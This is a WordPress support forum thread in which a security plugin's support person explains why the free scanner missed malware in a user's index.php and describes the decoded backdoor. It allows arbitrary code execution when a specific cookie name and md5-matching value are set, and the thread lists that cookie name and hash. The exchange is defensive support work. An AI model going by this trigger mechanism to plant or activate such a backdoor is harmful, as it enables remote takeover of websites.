Viewing 4 replies - 1 through 4 (of 4 total)
  • That is because among the six file system scanners implemented in the plugin only one checks for malicious code, the other scanners only check for the integrity of the files and it only applies for the WordPress core files, everything inside the content folder is ignored.

    Now, for the malware scanner it only runs when the user executes it, it does not runs in the background you need to click a button per to execute it from the administrator. If you ran the malware scanner and it did not report any malicious code then it is because SiteCheck (which is the service that powers the Malware Scan page) does not checks the content of the files (because that will require to have full access to your hosting account, and we are not requesting that level of access from the plugin) but instead it checks the rendered code of those files, so if the malware is smart enough to hide from a web scanner then it will not be flagged by the plugin.

    The story is different if you are using the “Server Side Scanner” which is another service offered by Sucuri.net but it is a premium service, so you will need to pay for it to use it.

    If you do not mind I would appreciate to have a copy of the malware that you found in that “index.php” file, I will forward it to our research team and it will be added to our signature’s database.

    Thread Starter DaveKoe

    (@davekoe)

    Thanks for following up.

    Here is one example of malicious code that I have found.

    https://pastebin.com/9FQg8UQq

    Scroll to the bottom

    I just decoded the malware and here it is [1], as you can see (I do not know if you understand PHP code) the script allows an attacker to execute arbitrary code but the person needs to set a cookie with this name [2] and set a value that encoded in md5 must match this string [3], that is why our malware scanner could not catch the script, because (as I explained in my previous message) SiteCheck only scans the rendered HTML code, considering that the name of the cookie is random it will be difficult to guess using an automated tool.

    I ran our “Server Side Scanner” [4] over that malicious script and it not only detected it but also cleaned the file, so our premium scanner could have detected the malicious code.

    [1] Original: https://pastebin.sucuri.net/en53j19so7cyt
    [1] Decoded: https://pastebin.sucuri.net/6tio4hqm321v8y
    [2] Cookie name: "8elc06hx"
    [3] Cookie value: "346ad0470722074b394f4fb03dddbe99"
    [4] Sucuri Web AntiVirus

    Thread Starter DaveKoe

    (@davekoe)

    Good to know. Thanks again.

Viewing 4 replies - 1 through 4 (of 4 total)
  • The topic ‘Hacked files not found’ is closed to new replies.